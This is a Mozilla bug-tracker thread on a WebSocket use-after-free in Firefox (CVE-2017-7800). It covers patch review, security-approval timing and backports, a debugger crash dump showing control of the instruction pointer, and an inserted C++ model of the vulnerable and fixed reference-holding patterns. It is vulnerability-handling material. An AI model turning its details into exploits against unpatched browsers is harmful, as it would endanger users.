Comment on attachment 8879832 [details] [diff] [review]
websocket.patch
The callers of Disconnect() should keep the object alive, but I'm fine with this too since this is super simple to land to branches too.
Attachment #8879832 -
Flags: review?(bugs) → review+
Assignee
Comment 6•7 years ago
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch
[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Yes. There is a test included.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Not particularly. I just keep WebSocketImpl alive before calling DisconnectInternal, instead of after.
Which older supported branches are affected by this flaw?
All.
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
It's easy to backport.
How likely is this patch to cause regressions; how much testing does it need?
None.
Attachment #8879832 -
Flags: sec-approval?
Updated•7 years ago
status-firefox54:
--- → wontfix
status-firefox55:
--- → affected
status-firefox56:
--- → affected
status-firefox-esr52:
--- → affected
tracking-firefox55:
--- → +
tracking-firefox56:
--- → +
tracking-firefox-esr52:
--- → 55+
Comment 7•7 years ago
(In reply to Andrea Marchesini [:baku] from comment #6)
> Comment on attachment 8879832 [details] [diff] [review]
> websocket.patch
>
> [Security approval request comment]
> How easily could an exploit be constructed based on the patch?
>
> Yes. there is a test included.
This can't be checked in "as is" then.
Security bugs that need sec-approval can't have a test checked in with them as the test will 0day our users.
We need the test and the fix separated into different patches and I can then sec-approval+ the fix and the test patch can land *after* we *ship* the fix in a final public release (such as Firefox 55).
The question above is more about "is this fix so obvious that checking in the fix points a giant sign as an exploitable security problem." I'll still need to understand the risk there when the patch is broken up.
Flags: needinfo?(amarchesini)
Comment 8•7 years ago
I see, now that I look at the patch, that there is no test so I guess this is a miscommunication.
I do see a Kungfu Deathgrip and, as Dan pointed out to me, the comment is kind of a giveaway: "DisconnectInternal() can release the object".
I'll give sec-approval+ but not for checkin until July 10, in the middle of the current development cycle.
Whiteboard: [checkin on 7/10]
Comment 9•7 years ago
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch
Once this goes in, we'll want Beta and ESR52 patches nominated as well.
Attachment #8879832 -
Flags: sec-approval? → sec-approval+
Assignee
Comment 10•7 years ago
> > Yes. there is a test included.
>
> This can't be checked in "as is" then.
What I meant is that there is a script able to trigger the crash. This script is not included in the patch but it's available from the description of the bug.
Flags: needinfo?(amarchesini)
Comment 11•7 years ago
Yes, I see that. The sec-approval questions are about the checkin and patch since the bug won't be opened until after we ship. You have sec-approval+ to check in on July 10 or after.
Comment 12•7 years ago
https://hg.mozilla.org/integration/mozilla-inbound/rev/bc535203a6eff61f308eb8ddf13afe8268cccb9f
Note that the attached patch needed rebasing on trunk due to bug 1372453. The patch as-attached applies cleanly to Beta but will require a bit of trivial rebasing for ESR52. Please request Beta and ESR52 approval on the patch when you get a chance.
Flags: needinfo?(amarchesini)
Whiteboard: [checkin on 7/10]
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla56
Assignee
Comment 14•7 years ago
Patch rebased
Attachment #8879832 -
Attachment is obsolete: true
Flags: needinfo?(amarchesini)
Assignee
Comment 15•7 years ago
Comment on attachment 8885156 [details] [diff] [review]
websocket.patch
Approval Request Comment
[Feature/Bug causing the regression]: WebSocket implementation
[User impact if declined]: The WebSocket object can be released before completing the Disconnect() operation. This is a UAF.
[Is this code covered by automated tests?]: no tests. race condition.
[Has the fix been verified in Nightly?]: none
[Needs manual test from QE? If yes, steps to reproduce]: none
[List of other uplifts needed for the feature/fix]: none
[Is the change risky?]: no.
[Why is the change risky/not risky?]: The ::Disconnect() method already uses a kungfuDeathGrip but this must be created at the beginning.
[String changes made/needed]: none
Attachment #8885156 -
Flags: approval-mozilla-esr52?
Attachment #8885156 -
Flags: approval-mozilla-beta?
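The pattern behind the fix discussed in comments 8 and 15 (DisconnectInternal() can drop the last reference to the object, so the kungFuDeathGrip has to be taken before that call, not after it), shown as an added C++ example that is not Mozilla's code: WebSocketImplModel, the RefPtr stand-in, mHolder, gLive and RunScenario are all constructed for illustration, and gLive lets the example report a would-be use-after-free without touching freed memory.

```cpp
#include <set>
// Constructed instrumentation: addresses of live objects, so the example can report
// "would be a use-after-free" instead of dereferencing freed memory.
static std::set<const void*> gLive;
// Minimal stand-in for Gecko's RefPtr (intrusive AddRef/Release); not Mozilla's code.
template <class T> class RefPtr {
  T* mPtr = nullptr;
 public:
  RefPtr() = default;
  explicit RefPtr(T* p) : mPtr(p) { if (mPtr) mPtr->AddRef(); }
  ~RefPtr() { if (mPtr) mPtr->Release(); }
  RefPtr& operator=(T* p) { if (p) p->AddRef(); T* old = mPtr; mPtr = p; if (old) old->Release(); return *this; }
  T* operator->() const { return mPtr; }
};

// Hypothetical model of WebSocketImpl: mHolder (the worker-side owner) is its only strong reference.
class WebSocketImplModel {
 public:
  int mRefCnt = 0;
  bool mDisconnected = false;
  RefPtr<WebSocketImplModel>* mHolder = nullptr;
  WebSocketImplModel() { gLive.insert(this); }
  ~WebSocketImplModel() { gLive.erase(this); }
  void AddRef() { ++mRefCnt; }
  void Release() { if (--mRefCnt == 0) delete this; }

  // "DisconnectInternal() can release the object": clearing the holder may drop the last
  // reference, so `this` may already be destroyed when this method returns.
  void DisconnectInternal() {
    RefPtr<WebSocketImplModel>* h = mHolder; mHolder = nullptr;
    if (h) *h = nullptr;
  }
  // Vulnerable shape: a member is written after DisconnectInternal().
  // Returns true when `this` was already freed at that point (a real UAF in the original code).
  bool DisconnectUnsafe() {
    DisconnectInternal();
    if (!gLive.count(this)) return true;
    mDisconnected = true; return false;
  }
  // Fixed shape, as the patch does: take the kungFuDeathGrip before DisconnectInternal(),
  // so the object outlives the call and the member write is safe.
  bool DisconnectSafe() {
    RefPtr<WebSocketImplModel> kungFuDeathGrip(this);
    DisconnectInternal();
    if (!gLive.count(this)) return true;
    mDisconnected = true; return false;
  }
};

// Builds an impl whose only strong reference is `holder`, then disconnects it; true means UAF.
bool RunScenario(bool useDeathGrip) {
  RefPtr<WebSocketImplModel> holder(new WebSocketImplModel());
  holder->mHolder = &holder;
  return useDeathGrip ? holder->DisconnectSafe() : holder->DisconnectUnsafe();
}
```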
Updated•7 years ago
Group: dom-core-security → core-security-release
Comment 16•7 years ago
Comment on attachment 8885156 [details] [diff] [review]
websocket.patch
sec-critical, beta55+, esr52.3+
Attachment #8885156 -
Flags: approval-mozilla-esr52?
Attachment #8885156 -
Flags: approval-mozilla-esr52+
Attachment #8885156 -
Flags: approval-mozilla-beta?
Attachment #8885156 -
Flags: approval-mozilla-beta+
Comment 17•7 years ago
uplift
Comment 18•7 years ago
uplift
Comment 19•7 years ago
(In reply to Andrea Marchesini [:baku] from comment #15)
> [Is this code covered by automated tests?]: no tests. race condition.
> [Has the fix been verified in Nightly?]: none
> [Needs manual test from QE? If yes, steps to reproduce]: none
Setting qe-verify- based on Andrea's assessment on manual testing needs.
Flags: qe-verify-
Updated•7 years ago
Flags: sec-bounty? → sec-bounty+
Updated•7 years ago
Alias: CVE-2017-7800
Whiteboard: [adv-main55+][adv-esr52.3+]
Comment 20•7 years ago
(In reply to Looben Yang from comment #2)
> A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate
> the clear exploitability by controlling the EIP register.
>
> Firefox Version: 56.0a1 (2017-06-17) (32-bit)
> OS: Windows 10 Home 64-bit
I was not able to reproduce any kind of crash, let alone one showing EIP control, with these same conditions (except I'm using Win 10 Pro instead of Home). I also tried 64-bit Firefox builds to no avail.
With the original testcase I had been able to reproduce a UAF-looking crash with both 32-bit and 64-bit Firefox 54.0.1 builds.
Reporter
Comment 21•7 years ago
(In reply to Daniel Veditz [:dveditz] from comment #20)
> (In reply to Looben Yang from comment #2)
> > A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate
> > the clear exploitability by controlling the EIP register.
> >
> > Firefox Version: 56.0a1 (2017-06-17) (32-bit)
> > OS: Windows 10 Home 64-bit
>
> I was not able to reproduce any kind of crash, let alone one showing EIP
> control, with these same conditions (except I'm using Win 10 Pro instead of
> Home). I also tried 64-bit Firefox builds to no avail.
>
> With the original testcase I had been able to reproduce a UAF-looking crash
> both 32-bit and 64-bit Firefox 54.0.1 builds.
Reporter
Comment 22•7 years ago
If it's not reproduced, then probably the timeout delay needs some adjustment.
I just simplified the PoC a little bit and attached it as UAF_DisconnectInternal_POC_EIP_41414141_2.js.
It seems a lot easier to reproduce on another machine. Daniel, can you give it a try with this one?
Firefox Version: 54.0.1 (32-bit)
OS: Windows 10 Pro 64-bit
(6060.2b6c): Access violation - code c0000005 (!!! second chance !!!)
eax=a1a1a1a1 ebx=195676a8 ecx=195676a8 edx=e5e5e5e5 esi=11c6d760 edi=19567600
eip=41414141 esp=00eff29c ebp=00eff2a4 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282
41414141 0000 add byte ptr [eax],al ds:002b:a1a1a1a1=41
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\SysWOW64\nvwgf2um.dll -
GetUrlPageData2 (WinHttp) failed: 12002.
FAULTING_IP:
unknown!noop+0
41414141 0000 add byte ptr [eax],al
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000008
Parameter[1]: 41414141
Attempt to execute non-executable address 41414141
FAULTING_THREAD: 00002b6c
PROCESS_NAME: firefox.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000008
EXCEPTION_PARAMETER2: 41414141
WRITE_ADDRESS: 41414141
FOLLOWUP_IP:
unknown!noop+0
41414141 0000 add byte ptr [eax],al
FAILED_INSTRUCTION_ADDRESS:
unknown!noop+0
41414141 0000 add byte ptr [eax],al
NTGLOBALFLAG: 400
APPLICATION_VERIFIER_FLAGS: 0
APP: firefox.exe
ANALYSIS_VERSION: 10.0.10240.9 x86fre
IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
BUGCHECK_STR: SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1
DEFAULT_BUCKET_ID: SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1
LAST_CONTROL_TRANSFER: from 0ff025b0 to 41414141
STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
00eff298 0ff025b0 e5e5e5e5 00eff2d4 10bb616e 0x41414141
00eff2a4 10bb616e 00000000 00000000 1e2b7a30 xul!RefPtr<mozilla::dom::StyleSheetList>::assign_assuming_AddRef+0x18
00eff2d4 10bb9dda 101dd28e 1ea744c0 1ea744f4 xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
00eff2d8 101dd28e 1ea744c0 1ea744f4 00000000 xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
00eff2ec 100852eb 1e2b7a30 196e89c0 196e89f4 xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
00eff314 1008526f 00eff344 100852eb 1f466970 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
00eff31c 100852eb 1f466970 0b7f5864 1e382670 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
00eff344 1008526f 00eff3c4 1001be8f 1e382670 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
00eff34c 1001be8f 1e382670 02e27170 02e27160 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
00eff3c4 1001d5ba 02e04200 00000000 00eff3f7 xul!nsThread::ProcessNextEvent+0x244
00eff3f8 101cb809 02e25060 293a22ed 0b7f5860 xul!mozilla::ipc::MessagePump::Run+0x72
00eff430 101cb7d8 02e04200 00000001 0b7f5800 xul!MessageLoop::RunHandler+0x20
00eff450 100ef8ce 0b7f7640 00000000 00eff470 xul!MessageLoop::Run+0x19
00eff460 100ef65d 0b7f5860 0b7f7640 00eff484 xul!nsBaseAppShell::Run+0x34
00eff470 100ef612 0b7f5860 00eff7d5 0d5ce080 xul!nsAppShell::Run+0x26
00eff484 100eeee6 0b7f7640 00eff6f0 00eff6d8 xul!nsAppStartup::Run+0x22
00eff678 1011dfc1 02e03050 00eff824 00000001 xul!XREMain::XRE_mainRun+0xa92
00eff6b4 1011d93d 02e101c0 02e10220 00eff824 xul!XREMain::XRE_main+0x366
00eff7e4 1011d8ff 00eff824 00effb68 00341bdd xul!XRE_main+0x39
00eff7f0 00341bdd 00000001 02e03050 00eff824 xul!mozilla::BootstrapImpl::XRE_main+0x11
00effb68 00345b3f 00000001 fe1a4498 00fa7560 firefox!wmain+0x65d
00effbb0 77958744 00c1e000 77958720 4de8583d firefox!__scrt_common_main_seh+0xf9
00effbc4 77e6587d 00c1e000 4d87acba 00000000 KERNEL32!BaseThreadInitThunk+0x24
00effc0c 77e6584d ffffffff 77e8632e 00000000 ntdll!__RtlUserThreadStart+0x2f
00effc1c 00000000 00345bb5 00c1e000 00000000 ntdll!_RtlUserThreadStart+0x1b
Updated•7 years ago
Flags: needinfo?(dveditz)
Comment 23•7 years ago
That worked a lot better, especially when I switched to tinderbox builds instead of nightlies so they didn't keep auto-updating. Very reliably crashed executing 0x41414141 in a 32-bit build.
bp-302daa81-58d5-411f-b463-89e940170721
bp-2882dd22-a602-4c21-ae88-6fe020170721
(I have no idea why it thinks the install time was two days ago. I just unzipped it shortly before running the testcase and submitting the crash, and the zip itself was packed on the build date last month).
Flags: needinfo?(dveditz)
Updated•7 years ago
Group: core-security-release
Updated•6 years ago
Component: DOM → DOM: Core & HTML
Updated•6 months ago
Keywords: reporter-external